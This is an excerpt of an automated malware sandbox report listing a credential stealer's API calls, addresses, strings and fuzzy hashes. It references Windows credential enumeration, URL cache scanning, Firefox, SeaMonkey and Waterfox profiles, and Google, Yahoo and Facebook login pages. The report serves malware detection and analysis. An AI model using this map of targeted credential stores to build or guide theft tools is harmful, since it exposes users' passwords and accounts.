• memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• wcschr.MSVCRT ref: 0040C324
• wcschr.MSVCRT ref: 0040C344
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• GetLastError.KERNEL32 ref: 0040C373
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
• String ID: visited:
• API String ID: 1157525455-1702587658
• Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
• Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
• Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
• Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

Control-flow Graph (rendered graph; edge list omitted)

APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E28B
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 2804212203-2982631422
• Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
• Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
• Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
• Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Control-flow Graph

APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
• memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 115830560-3916222277
• Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
• Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                            • free.MSVCRT ref: 0041848B
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile$ErrorLastfree
                                                                                                                                            • String ID: |A
                                                                                                                                            • API String ID: 77810686-1717621600
                                                                                                                                            • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                            • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0041249C
                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                            • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                            • String ID: r!A
                                                                                                                                            • API String ID: 2791114272-628097481
                                                                                                                                            • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                            • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                            • API String ID: 2936932814-4196376884
                                                                                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                            • String ID: BIN
                                                                                                                                            • API String ID: 1668488027-1015027815
                                                                                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                            • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                            • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                            • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                            • memset.MSVCRT ref: 0040BE91
                                                                                                                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                            • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 697348961-0
                                                                                                                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 00403CBF
                                                                                                                                            • memset.MSVCRT ref: 00403CD4
                                                                                                                                            • memset.MSVCRT ref: 00403CE9
                                                                                                                                            • memset.MSVCRT ref: 00403CFE
                                                                                                                                            • memset.MSVCRT ref: 00403D13
                                                                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                            • memset.MSVCRT ref: 00403DDA
                                                                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                            • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                            • API String ID: 3527940856-11920434
                                                                                                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
APIs
• memset.MSVCRT ref: 00403E50
• memset.MSVCRT ref: 00403E65
• memset.MSVCRT ref: 00403E7A
• memset.MSVCRT ref: 00403E8F
• memset.MSVCRT ref: 00403EA4
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403F6B
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
• String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
• API String ID: 3527940856-2068335096
• Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
• Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
• Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
• Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
APIs
• memset.MSVCRT ref: 00403FE1
• memset.MSVCRT ref: 00403FF6
• memset.MSVCRT ref: 0040400B
• memset.MSVCRT ref: 00404020
• memset.MSVCRT ref: 00404035
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 004040FC
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• API String ID: 3527940856-3369679110
• Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
• Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
• Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
• Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
APIs
• memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
• Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
• Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
• Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
• Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 004033B7
• memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
• wcscmp.MSVCRT ref: 004033FC
• _wcsicmp.MSVCRT ref: 00403439
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
• String ID: $0.@
• API String ID: 2758756878-1896041820
• Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
• Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
• Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
• Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 2941347001-0
• Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
• Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
• Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
• Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
APIs
• memset.MSVCRT ref: 00403C09
• memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
• wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
• wcscat.MSVCRT ref: 00403C70
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: memsetwcscat$Closewcscpywcslen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
• API String ID: 3249829328-1174173950
• Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
• Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
• Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
• Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
APIs
• memset.MSVCRT ref: 0040A824
• GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
• wcscpy.MSVCRT ref: 0040A854
• wcscat.MSVCRT ref: 0040A86A
• LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
                                                                                                                                            • API String ID: 669240632-0
                                                                                                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                            APIs
                                                                                                                                            • wcschr.MSVCRT ref: 00414458
                                                                                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                            • String ID: "%s"
                                                                                                                                            • API String ID: 1343145685-3297466227
                                                                                                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                            • API String ID: 1714573020-3385500049
                                                                                                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
